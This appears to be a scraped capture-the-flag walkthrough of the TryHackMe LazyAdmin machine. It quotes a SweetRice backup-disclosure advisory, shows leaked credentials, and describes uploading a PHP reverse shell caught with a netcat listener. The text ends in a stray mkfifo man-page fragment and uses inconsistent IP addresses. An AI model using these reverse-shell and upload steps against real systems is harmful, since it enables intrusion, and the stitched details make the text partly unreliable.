TryHackMe | LazyAdmin
Easy linux machine to practice your skills
tryhackme.com
Walkthrough
Gaining a Foothold
Nmap
Default Web Page
10.10.152.201:80
10.10.151.201/content
SweetRice
10.10.151.201/content
login panel
10.10.151.201/content/attachment/
10.10.151.201/content/_themes
10.10.151.201/content/inc
Information Disclosure
Not Found
Apache 2.4.18
SweetRice 1.5.1 - Backup Disclosure Vulnerability
Title: SweetRice 1.5.1 - Backup Disclosure Application: SweetRice Versions Affected: 1.5.1 Vendor URL: http://www.basic-cms.org/ Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip Discovered by: Ashiyane Digital Security Team Tested on: Windows 10 Bugs: Backup Disclosure
Proof of Concept :
You can access to all mysql backup and download them from this directory. http://localhost/inc/mysql_backup
and can access to website files backup from: http://localhost/SweetRice-transfer.zip
https://vulners.com/zdt/1337DAY-ID-26249
https://www.exploit-db.com/exploits/40718
/content/inc/mysql_backup
LazyAdmin credentials
Lazy Admin
username manager
42f749ade7f9e195bf475f37a44cafcb
Password123
Logged in as manager:Password123
HTTP Enumeration
FFUF
/content
Dirb
Escalating Privileges
Arbitrary File Upload
https://www.exploit-db.com/exploits/40716
http://10.10.152.201/content/as/?type=media_center&mode=upload/file
Uploaded the reverse shell
Started listener
http://10.10.152.201/content/attachment/r.php5
or
http://10.10.152.201/content/attachment/ then click r.php5
Gained shell
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 5554
listening on [any] 5554 ...
connect to [10.8.252.53] from (UNKNOWN) [10.10.152.201] 52026
/bin/sh: 0: can't access tty; job control turned off
# whoami
rootThe mkfifo() function shall create a new FIFO special file named by the pathname pointed to by path.
A FIFO special file sends data from one process to another so that the receiving process reads the data first-in-first-out (FIFO).